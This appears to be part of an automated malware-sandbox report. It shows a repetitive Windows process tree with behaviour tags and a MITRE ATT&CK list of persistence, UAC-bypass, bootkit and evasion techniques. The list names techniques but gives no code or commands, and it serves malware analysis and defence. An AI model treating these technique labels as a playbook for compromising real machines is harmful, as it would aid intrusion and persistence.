C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7900 -s 46562⤵PID:5448
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:7584
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7756
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3904
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:4060
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4784
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1064
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:1776
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:7872
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:7244
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6352
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:6568
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:7740
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:6220
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:1668
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:1144
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:8132
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:4196
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4272
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4888
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3912
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3096
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4700
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:7764
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:8096
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:6216
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:1328
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6344
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3420
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
PID:5560
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:6536
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2308
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:6276
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2008
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2008 -s 61562⤵PID:1632
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:8032
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:7724
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:560
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4896
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:1316
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:7644
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:7132
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:6000
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:5188
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:7048
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:7904
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:6952
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:6588
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4920
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:4816
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2992
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3920
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2580
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3060
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 2992 -ip 29921⤵PID:3696
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:188
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3336
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:6580
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:7688
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:6672
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:5364
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:7368
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:7888
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:1092
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:6276
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:7024
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:5564
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5184
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:1580
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:6376
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:6772
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:7800
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:2692
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:6944
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:5584
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:7720
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:1832
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4100
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:6804
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:6508
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4012
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:8080
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:380
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:7176
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3792
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1352
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:4364
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4620
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4992
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:840
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:6720
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:3108
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:2596
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5564
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:7208
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4568
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:7392
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:6376
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:7956
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:8004
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:7048
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2692
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:2088
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5216
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3e0e855 /state1:0x41c64e6d1⤵PID:5576
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3700
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:7452
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3e1f055 /state1:0x41c64e6d1⤵PID:5768
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Event Triggered Execution
3Accessibility Features
1Image File Execution Options Injection
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Event Triggered Execution
3Accessibility Features
1Image File Execution Options Injection
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
